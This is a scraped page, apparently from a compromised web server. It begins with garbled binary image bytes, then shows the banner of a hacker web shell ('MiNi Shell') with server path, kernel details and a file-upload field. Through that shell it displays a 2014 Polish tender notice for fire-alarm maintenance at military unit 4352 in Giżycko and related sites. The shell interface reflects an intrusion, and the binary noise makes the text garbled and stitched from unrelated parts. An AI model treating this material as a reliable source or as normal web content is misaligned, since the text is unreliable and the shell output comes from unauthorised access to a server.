JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140113/13016-N-2014.html

<p class="kh_header"><b>Giżycko: USŁUGA W ZAKRESIE OBSŁUGI SERWISOWEJ, KONSERWACYJNEJ ELEKTRONICZNYCH SYSTEMÓW WYKRYWANIA I SYGNALIZACJI POŻARU W REJONIE DZIAŁANIA JEDNOSTKI WOJSKOWEJ 4352 GIŻYCKO.</b><br>
<b>Numer ogłoszenia: 13016 - 2014; data zamieszczenia: 13.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl., www.bip.mon.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA W ZAKRESIE OBSŁUGI SERWISOWEJ, KONSERWACYJNEJ ELEKTRONICZNYCH SYSTEMÓW WYKRYWANIA I SYGNALIZACJI POŻARU W REJONIE DZIAŁANIA JEDNOSTKI WOJSKOWEJ 4352 GIŻYCKO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przetarg nieograniczony obejmuje w swoim zakresie obsługę serwisową, konserwacyjną elektronicznych systemów wykrywania i sygnalizacji pożaru 
w rejonie działania Jednostki Wojskowej 4352 Giżycko.

1. WSTĘP

1.1. PRZEDMIOT SPECYFIKACJI TECHNICZNEJ ST
Przedmiotem niniejszej Specyfikacji Technicznej są wymagania i warunki dotyczące
obsługi serwisowej i konserwacyjnej  elektronicznych systemów wykrywania i sygnalizacji pożaru zainstalowanych w budynkach Nr 1 i Nr 2 przy ul. Moniuszki 7 w Giżycku, w budynkach Nr 3 i Nr 5 przy ul. Nowowiejskiej 20 w Giżycku, w budynku Nr 3 przy ul. Wojska Polskiego 21 w Giżycku, w budynku Nr 1 w WOSZK Mrągowo, w budynku Nr 63 w Orzyszu, w budynku Nr 17 WKU w Ełku, w Strzelnicy dla pojazdów bojowych w kompleksie JW. 2098 Bemowo Piskie - Orzysz Poligon, w Bemowie Piskim przy ul. Kętrzyńskiego 1 -Żandarm. Wojsk., w budynku Nr 32 na terenie JW.1747 w Suwałkach, w bud Nr 1 JW. 2031 Lipowiec w miejscowości Szelment  3    16-400 Suwałki, w budynku Nr 11 na terenie JW. 4808 Gołdap  i w bud Nr 2 i 3 na terenie JW. 2568 w Węgorzewie. 

1.2. ZAKRES STOSOWANIA ST

Specyfikacja Techniczna jest stosowana jako dokument przetargowy i kontraktowy przy zlecaniu i realizacji obsługi serwisowej, konserwacyjnej  elektronicznych systemów wykrywania i sygnalizacji pożaru zainstalowanych w rejonie działania JW. 4352 Giżycko.

1.3. ZAKRES  PRAC OBJĘTYCH ST
Specyfikacja Techniczna obejmuje w swoim zakresie wykonanie wszystkich czynności umożliwiających obsługę serwisową i konserwacyjną  elektronicznych systemów wykrywania i sygnalizacji pożaru zainstalowanych w budynkach Nr 1 i Nr 2 przy ul. Moniuszki 7 w Giżycku, w budynkach Nr 3 i Nr 5 przy ul. Nowowiejskiej 20 w Giżycku, w budynku Nr 3 przy ul. Wojska Polskiego 21 w Giżycku, w budynku Nr 1 w WOSZK Mrągowo, w budynku Nr 63 w Orzyszu, w budynku Nr 17 WKU w Ełku, w Strzelnicy dla pojazdów bojowych w kompleksie JW. 2098 Bemowo Piskie Orzysz Poligon, w Bemowie Piskim przy ul. Kętrzyńskiego 1 - Żandarm. Wojsk., w budynku Nr 32 na terenie JW.1747 w Suwałkach, w bud Nr 1 JW. 2031 Lipowiec w miejscowości Szelment  3 16-400 Suwałki, w budynku Nr 11 na terenie JW. 4808 Gołdap  i w bud Nr 2 i 3 na terenie JW. 2568 w Węgorzewie. 
Zakres przedmiotu zamówienia robót konserwacyjnych i naprawy obejmuje:
-sprawdzenie  centrali zgodnie z procedurą jej obsługi,
-sprawdzenie poprawności działania każdego urządzenia transmisji alarmu przy 
 współpracy z alarmowym centrum odbiorczym - sprawdzenie działania linii
 dozorowych,
-sprawdzenie poprawności działania wszystkich czujek łącznie z urządzeniami
 uruchamianymi ręcznie,
-sprawdzenie układów liniowych według zaprogramowanych wariantów,
-przetestowanie elementów w liniach dozorowych,
-sprawdzenie działania systemu alarmowania ppoż. poprzez zainicjowanie pożaru w 
  każdej linii dozorowej,
-kontrola urządzeń wchodzących w skład  systemu pod względem uszkodzeń
  mechanicznych oraz ich czyszczenie,
-kontrola mocowania okablowania całego systemu,
-sprawdzenie poprawności działania akustycznego sygnalizatora alarmowego,
-sprawdzenie poprawności działania zasilaczy,
-sprawdzenie zasilania podstawowego pomiar napięcia,
-sprawdzenie sygnalizacji braku źródła podstawowego i rezerwowego,
-sprawdzenie stanu zapasowych źródeł zasilania kontrola napięcia ładowania
 akumulatorów oraz ich stan naładowania,
-konserwacja zacisków akumulatorów,
-konserwacja zacisków, styków i złącz elektrycznych,
-sprawdzenie stanu połączeń przewodu ochronnego,
-wymiana uszkodzonych wskaźników żarówki lub diody typu LED,  bezpieczników, oporników oraz szybek do przycisków typu ROP,
-naprawa systemu, który uległ awarii,
-prowadzenie Książki Pracy Systemu - wpisywanie uwag o stanie technicznym,
-sporządzanie protokołów przeglądu z oceną stanu technicznego,
-sporządzanie protokołów kontroli szczelności izotopowych czujek dymu.
W/w zakres czynności należy wykonywać co pół roku, a w m. Szelment co 3 miesiące.
W przypadku zainstalowanych izotopowych  czujek dymu, należy 1 raz w roku dokonywać pomiaru szczelności źródła promieniotwórczego i sporządzić protokół z pomiaru.

1.4. KOD WSPÓLNEGO SŁOWNIKA ZAMÓWIEŃ PUBLICZNYCH  CPV

  CPV  752511104  - usługi ochrony przeciwpożarowej    

1.5. WYMAGANIA OGÓLNE
Prace konserwacyjne i serwisowe należy wykonywać zgodnie z aktualnie obowiązującymi przepisami. Mają one wykazać ewentualne nieprawidłowości i usterki i zapewnić sprawność systemów SAP. 

2. WYKAZ  SYSTEMÓW ALARMU POŻAROWEGO W  REJONIE DZIAŁANIA  JEDNOSTKI  WOJSKOWEJ NR 4352.

2.1.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego i oddymiania w bud.  Nr 1 ul. Moniuszki 7 w Giżycku:
konserwacja od 01.01.2014 do 31.12.2016r co pół  roku
a. urządzenia systemu sygnalizacji pożaru:
-centrala sygnalizacji pożaru POLON-4200                                      - szt.1
-akumulatory żelowe 12V 38Ah                                                        - szt.2
-czujka izotopowa dymu DIO-4043                                                   - szt.45
-czujka optyczna dymu uniwersalna DUR-4043                               - szt.18
-czujka optyczna dymu   DOR-4043                                                 - szt.2
-czujka ciepła uniwersalna TUN-4043                                              - szt.4
-gniazdo czujki G-40                                                                         - szt.69
-ręczny ostrzegacz pożarowy ROP=4001M                                     - szt.5
-element kontrolno-sterujący EKS-4001                                           - szt.1
-sygnalizator głosowo-optyczny SGO-Pgz                                        - szt.1

 b. urządzenia systemu oddymiania:
-centrala oddymiania RZN-4408K                                                     - szt.1
-akumulatory żelowe 12V 3,5Ah                                                        - szt.2
-przycisk oddymiania RT-42                                                              - szt.1
-przycisk oddymiania RT-42ST                                                          - szt.1
-przycisk przewietrzania  SLT-42U-PL                                               - szt.1
-klapa 100x140 z owiewkami i siłownikiem 24V 2,5A                        - szt.2
-moduł komunikacyjny SATEL GSM-4PS                                          - szt.1
-syntezer mowy SM-2                                                                        - szt.1
-akumulator żelowy 12V 7Ah                                                             - szt.1

2.2.Wykaz urządzeń systemu SAP i oddymiania w budynku Nr 2 ŻW ul. 
Moniuszki 7 w Giżycku:
konserwacja od 01.01.2014 do 31.12.2016r  co pół roku
-czujnik p.poż DUR-40 Alfa                                              -szt.4
-ręczny ostrzegacz pożarowy ROP 2                               -szt.2
-centrala syst. sygn.  pożarowej IGNIS 1000                   -szt.2
-sygnalizator wewnętrzny dźwiękowy p.poż                     -szt.2

2.3.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego
  w  JW.4352 ul. Nowowiejska 20 w Giżycku w bud. Nr 3 i 5:
 konserwacja od 01.01.2014 do 31.12.2016r  co pół roku
-centrala ppoż. Siemens                                                                     - szt.2
-ręczny ostrzegacz ROP        WR 2001/33                                        - szt.1
-sygnalizator wewnętrzny                                                                   - szt.1
-sygnalizator zewnętrzny                                                                   - szt.1
-akumulator 12V 7Ah                                                                         - szt.4
-czujka dymu OH 320C Siemens                                                       - szt.6
-czujka Bosch OT-400                                                                        - szt.13
-gniazdo czujki MS-400                                                                      - szt.13
-ostrzegacz ręczny ROP DM-210                                                       - szt.3
-sygnalizator optyczny     BL-200                                                        - szt.5
-sygnalizator akustyczny   FNM-320-SRD                                          - szt.1
-UPS 24 6A                                                                                         - szt.1
   
2.4.Wykaz urządzeń systemu SAP w budynku nr 3 pomieszczenie węzła łączności ul. Wojska Polskiego 21 w Giżycku: 
konserwacja od 01.01.2014r do 31.12.2016r  co pół roku
-centrala sygnalizacji pożarowej BOSCH FPA 5000                         - szt.1
-czujka BOSCH OT-400                                                                    - szt.4
-gniazdo czujki MS-400                                                                     - szt.4
-ROP DM-210                                                                                    - szt.2
-Sygnalizator optyczny BL-200                                                          - szt.3
-Sygnalizator akustyczny SG-100                                                      - szt.3
-UPS 24 16A	- szt.1
-Akumulator 12V 28Ah                                                                       - szt.2

2.5.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego SAP
  w budynku Nr 1 w Wojskowym Ośrodku Szkoleniowo-Kondycyjnym Mrągowo: 
  konserwacja od 01.01.2014 do 31.12.2016r co pół roku
-centrala sygn. pożaru POLON  ALFA 4000                     -szt.1
-wielodetektorowa czujka optyczna dymu DOT-4046       -szt.6
-czujka optyczna dymu DUR-4043                                   -szt.111
-ręczny ostrzegacz pożaru ROP-4001 M                          -szt.14
-element kontrolno-sterujący EKS-4001                           -szt.3
-pożarowy sygn.. akustyczny SAL -4001                          -szt.14
-centrala systemu oddymiania RZN-4402K                       -szt.1
-przycisk oddymiania RT-42                                              -szt.10                        
-akumulator ołowiowy 40 Ah/12V                                      -szt.2
-klapa dymowa o wymiarach 150x150cm firmy D+H        -szt.1
System wymaga stałej konserwacji i monitoringu

2.6.Wykaz urządzeń systemu SAP w budynku nr 63 w Orzyszu: 
konserwacja od 01.01.2014r do 31.12.2016r co pół roku
-centrala sygnalizacji pożarowej Polon-Alfa CSP-38                        - szt.1
-czujka jonizacyjna DIO-36                                                               - szt.17
-czujka optyczna DOR-35                                                                 - szt.65
-czujka TUP-37                                                                                 - szt.6
-przycisk ROP-38A                                                                           - szt.6

2.7.Wykaz urządzeń systemu SAP w budynku nr 17 WKU w Ełku:
 konserwacja od 01.01.2014r do 31.12.2016r co pół roku
-centrala sygnalizacji pożarowej Polon Alfa POLON 4900               - szt.1
-akumulator 33Ah/12 V                                                                     - szt.2
-gniazdo do czujek szeregów 40 i 4040                                         - szt.58
-optyczna czujka dymu DOR-4046                                                   - szt.24
-optyczna uniwersalna czujka dymu DUR-4046                               - szt.26
-czujka dwusensorowa opt. dymu +ciepła DOT-4046                     - szt.8
-ręczny ostrzegacz pożar. Adresowalny ROP-4001M                      - szt.9
-sygnalizator akustyczny adresowalny SAL-4001+baterie 6R61
  9V alkaliczne Duracell MN 1604/6LR61                                         - szt.7
-sygnalizator akustyczny do111 dB, 32 różne sygnały, 2 wejścia
 sterujące, priorytet, regulacja głośności, IP54 AGN 24.6+
Sygnalizator świetlny- błyskowy, częstotliwość błysku 1 Hz 60/min
 energia wyładowania 2J, IP65 ALB24.1R                                        - szt.1
System wymaga stałej konserwacji i monitoringu

2.8.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego SAP
  w Strzelnicy dla pojazdów bojowych w kompleksie JW.2098 Bemowo Piskie Orzysz Poligon: konserwacja od 01.01.2014 do 31.12.2016r  co pół roku
-centrala sygnalizacji  pożaru POLON   4200                    -szt.1
-akumulator żelowy  12V                                                   -szt.2 
-ręczny ostrzegacz pożaru ROP-4001 MH                        -szt.4
-puszka do ROP                         P-4                                  -szt.4                      
-gniazdo pożarowe                     G-40                               -szt.20
-czujka dwusensorowa DOT 4046                                     -szt.20
-sygnalizator adresowalny  SAL 4001                                -szt.3
-Terminal Sygnalizacji Równoległej TSR4000                    -szt.1

2.9.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego SAP
  w Bemowie Piskim przy ul. Kętrzyńskiego 1 Żandarmeria Wojskowa: konserwacja od 01.01.2014 do 31.12.2016r co pół roku
-centrala sygnalizacji  pożaru IGNIS    1020                      -szt.1
-czujka DOR 35 + gniazdo G-35                                        -szt.4 
-czujka ROP- 33                                                                 -szt.2
-wskaźnik zadziałania WZ- 31                                            -szt.3                      
-akumulator  1,5 Ah                                                            -szt.2 

2.10.Wykaz urządzeń systemu wykrywania i sygnalizacji pożaru zainstalowanego w budynku nr 32 na terenie JW. 1747 w Suwałkach:
konserwacja od 01.01.2014 do 31.12.2016r   co pół roku
-centrala Fc1008A-kpl.1;
-czujka optyczna dymu OP 320C z gniazdem SO 320 i adapterem SOA322- kpl.8;
-ręczny ostrzegacz pożarowy ROP DM 1131-szt.2;
-sygnalizator wewnętrzny p. poż.SA-K6-szt.2.

2.11.Wykaz urządzeń instalacji  wideo domofonowej i systemu sygnalizacji pożaru zainstalowanych w JW. 2031 Lipowiec w miejscowości Szelment 3, 
16-400 Suwałki:
konserwacja od 1.01.2014 do 31.12.2016r  co kwartał
a. Wykaz urządzeń instalacji  wideo domofonowej:
-system wideo domofonowy  prod. SIEMENS
- unifon interkomowy typ REF 1132/501-szt.1
-panele domofonowe REF 1155/21-szt.2

b. Wykaz urządzeń systemu sygnalizacji pożaru firmy SIEMENS:
-centrala sygnalizacji pożaru FC 2020        - szt.1
-optyczna czujka dymu FDO 221                - szt.72
-czujka płomienia FDF 221-9                      - szt.2
-czujka ciepła FDT 221                               - szt.1
-czujka neuronowa FDOOT 241-9              - szt.4
-czujka liniowa FDL 241-9                           - szt.2
-wskaźnik zadziałania DJ 1192                   - szt.19
-ręczny ostrzegacz pożarowy FDME 223   - szt.16
-moduł 4wej./4wyj. FDCIO 222                   - szt.26
-sygnalizator optyczno- akustyczny SAK-7 - szt.13

c. Wykaz urządzeń systemu zasysającego:
-centrala zasysająca Titanus 3000                                - szt.1
-zasilacz 135W/5A ZSP135D2                                      - szt.1
-optyczna czujka dymu DO1161                                   - szt.1
-przekaźnik R2 24V DC R2-2012-23-1024-WT Relpol - szt.1 

d. Wykaz urządzeń systemu gaszeniowego:
-centrala gaszeniowa 1 strefa, 4 linie XC 1001-A firmy SIEMENS  - szt.1
-przycisk START DM1103-L firmy SIEMENS                                  - szt.2
-sygnalizator akustyczno-optyczny SAK 7 firmy SIEMENS             - szt.2
-przycisk STOP do gaszenia DM 1103-5 firmy SIEMENS             - szt.2
-czujka neuronowa FDOO T 241-9 firmy SIEMENS                         - szt.4
-zbiornik 13,4 z zaworem LPG-128-00 firmy In Gas o zawartości 8,6 kg środka HFC 227ea - szt.1
-łącznik ciśnieniowy z mechanizmem blokującym firmy In Gas        - szt.1
-wyzwalacz elektromagnetyczny firmy In Gas                                  - szt.1
-wyzwalacz ręczny- dźwigowy firmy In Gas                                      - szt.1
-czujnik spadku ciśnienia firmy In Gas                                              - szt.1
System wymaga stałej konserwacji i monitoringu

2.12.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego SAP
  w budynku nr 11 na terenie JW. 4808 Gołdap: konserwacja od 01.01.2014 do   31.12.2016r  co pół roku
-centrala sygnalizacji  pożaru POLON   4200                                     -szt.1
-terminal sygnalizacji równoległej typ TSR-4000                                -szt.2
-akumulator  4Ah/12V typ EP-7-12                                                     -szt.4
-sygnalizator akustyczny adresowalny typ SAL-4001                         -szt.3
-pojemnik dla akumulatorów od 24Ah do 44Ah typ PAR-4800           -szt.1
-akumulator 40Ah/12V typ EC-40-12                                                  -szt.2
-sygnalizator akustyczno-optyczny zewnętrzny typ AS-367               -szt.2 
-ręczny ostrzegacz pożarowy ROP-4001 M                                       -szt.3
-ramka maskująca (czerwona) do wersji natynkowej typ RM-60-R    -szt.3
- ręczny ostrzegacz pożarowy IP55 typ ROP-4001 M                        -szt.2
-gniazdo do czujek 4043, 4046 typ G-40	                 -szt.6
-uniwersalna czujka ciepła typ TUN-4043	                 -szt.6
-puszka połączeniowa, przelotowa PIP-1A                                         -szt.2                      

2.13.Wykaz urządzeń systemu Sygnalizacji Alarmu Pożarowego SAP
  w budynkach Nr 2 i 3 na terenie JW. 2568 Węgorzewo:                                    konserwacja od 01.01.2014 do 31.12.2016r  co pół roku
-centrala  pożarowa Synowa FC 330AE Siemens                     -szt.1
-zestaw 4 epromów FCA 185  Siemens                                    -szt.1
-gniazdo czujek Seria 300     Siemens                                      -szt.28
-czujka optyczno- temperaturowa OH 320A   Siemens            -szt.35
-ręczny ostrzegacz pożarowy MT 320 A   Siemens                  -szt.10
- ręczny ostrzegacz pożarowy DM1131/MTE320C Siemens    -szt.1
- ręczny ostrzegacz pożarowy MT 622A Siemens                    -szt.2
- ręczny ostrzegacz pożarowy DM 1132 Siemens                    -szt.1                        
- sygnalizator wewnętrzny SAK 2                                             -szt.4
- sygnalizator zewnętrzny Bedlam AO Siemens                       -szt.1
- wskaźnik zadziałania AL.30/AL300  Aritech                           -szt.7
- akumulator EP 12 Ah/12 V AGM Yuasa                                 -szt.2
- dialer telefoniczny Roger 07                                                   -szt.1

3. SPOSÓB WYKONYWANIA PRAC KONSERWACYJNYCH:
1/Konserwacja instalacji i urządzeń systemów sygnalizacji pożaru obejmuje stały nadzór nad całokształtem działania urządzeń, gwarantować ma utrzymanie urządzeń w sposób zapewniający niezawodne i prawidłowe ich funkcjonowanie.
2/W/w zakres czynności należy wykonywać nie mniej niż raz na pół roku.
3/Podjąć czynności związane z naprawą uszkodzonego urządzenia w ciągu 8 godzin od chwili powiadomienia przez Zleceniodawcę o niesprawności urządzenia. O konieczności wymiany zużytych podzespołów lub części należy bezzwłocznie powiadomić użytkownika stosownym protokołem zużycia.
4/Materiały pochodzące z wymiany w czasie konserwacji lub naprawy nie nadające się do ponownego wbudowania Wykonawca zutylizuje we własnym zakresie.
5/W przypadku konieczności usunięcia awarii i dokonania naprawy Wykonawca jest zobowiązany do:
-wystąpienia do Zamawiającego o zgodę na zakup części zamiennych niezbędnych    do prawidłowego funkcjonowania urządzeń,
-zapewnienia dostawy części zamiennych części nowych, oryginalnych,
-przedstawienie Zamawiającemu faktur na zakupione części zamienne,
-bezpłatny montaż części.
6/Dla każdego systemu założyć Książkę Pracy Systemu Przeciwpożarowego do której należy wpisywać zakres dokonanych czynności konserwacyjnych i naprawczych z wyszczególnieniem wymienionych części.
7/W Książce Pracy Systemu Przeciwpożarowego powinny widnieć nazwiska uprawnionych konserwatorów Wykonawcy mogących dokonywać w niej wpisów. Każdy wpis do książki konserwacyjnej powinien być potwierdzony przez pracownika upoważnionego przez Zamawiającego.
8/Wykonawca jest zobowiązany przedstawić wykaz osób przewidywanych do realizacji przedmiotu zamówienia.

4.WARUNKI REALIZACJI ZADANIA:
      1. Realizacja robót w godzinach 700-1530  od poniedziałku do czwartku od 700-1300  
          w  piątki. 
      2. Roboty będą prowadzone na terenie użytkowanym czynny zakład.
      3. Oferent złoży oświadczenie o niekaralności pracowników.
      4. Roboty realizowane będą w kompleksach wojskowych zamkniętych.

5. DODATKOWE WYMAGANIA ZLECAJĄCEGO:
5.1. Ogólne wymagania dotyczące robót.
Wykonawca jest odpowiedzialny za prowadzenie prac  konserwacyjnych zgodnie z obowiązującymi przepisami, aktualnymi normami  i niniejszą specyfikacją techniczną
5.2. Wymagania wewnętrzne Zamawiającego.
  1. Wykonawca robót w pełni odpowiada za bezpieczeństwo i higienę pracy 
    w   miejscu  realizacji robót oraz za zachowanie bezpieczeństwa pożarowego.
  2. Wykonawca dołączy odpowiednie uprawnienia na organizację, eksploatację i obsługę  konserwacyjną systemu pożarowego.

6. PODSTAWA PŁATNOŚCI:
    Podstawę  do  wystawienia  przez  Wykonawcę  faktury  stanowi  protokół stwierdzający  wykonanie  przedmiotu  umowy podpisany przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się 
